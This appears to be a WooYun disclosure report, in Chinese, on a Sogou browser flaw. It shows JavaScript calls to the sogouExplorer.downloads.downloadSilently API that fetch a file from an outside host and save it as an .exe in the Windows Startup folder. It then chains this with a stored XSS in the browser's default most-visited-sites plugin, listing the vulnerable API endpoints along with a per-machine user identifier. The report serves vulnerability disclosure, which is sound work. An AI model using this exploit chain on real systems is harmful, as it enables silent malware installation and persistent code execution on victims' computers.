WooYun.org

1、搜狗浏览器的开发api开放了很多，比较360的两款，发现多了一个downloads，试之，问题出来了。
http://ie.sogou.com/open/doc/?id=2_13&title=sogouExplorer.downloads
2、在se-extension://域可以查看搜狗开放的所有api，在对象空间sogouExplorer下面

3、发现sogouExplorer.downloads.downloadSilently，测试其参数

4、按要构造参数

sogouExplorer.downloads.downloadSilently({url:"http://tmxk.org/img/r-c.png",filename:"dd.exe",path:"d:\",method:"GET"})

5、查看d盘

6、然后呢？下载任意文件到启动项？

sogouExplorer.downloads.downloadSilently({url:"http://tmxk.org/img/r-c.png",filename:"dd.exe",path:"C:\Users\lenovo\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup",method:"GET"})

7、然后呢，没看到是se-extension://域吗，自己写个插件等别人安装？不需要。
8、搜狗浏览器，默认安装插件【常用浏览】，插件地址se-extension://ext-126754004/quickLink/popup.html，

你浏览次数最多的网站会被自动放在这里，这个插件就是se-extension://域的，结果这个插件有浏览网站标题、域名里双引号导致的存储xss。。。
如下：

界面的增加接口为
http://abc.ie.sogou.com/staticmodify.php?m=A60070E11C3F2F1BACF3FD5E75686F5B&from=mysql&url=网址&act=add&arg=0&short=标题&method=ajaj&source=se&cbid=cb_1
删除接口
http://abc.ie.sogou.com/staticmodify.php?m=A60070E11C3F2F1BACF3FD5E75686F5B&from=mysql&url=网址&act=hide-delete&method=ajaj&source=se&cbid=cb_1
查看接口
http://abc.ie.sogou.com/getentry.php?m=A60070E11C3F2F1BACF3FD5E75686F5B&from=mysql&type=seusual&block=entry&method=ajaj&cbid=cb_0
大家发现了m参数，这个参数就是识别特定用户，每个电脑是唯一的，不管你卸载多少次。
同时上面的几个地址都有非持久xss。
9、一个网址你浏览多次后，会被自动记录在最常访问里，这样如果这个网址是特意构造过的，就会触发xss执行se-extension域下sogouExplorer命令空间下面的任意命令了，包括下载任意文件到任意位置。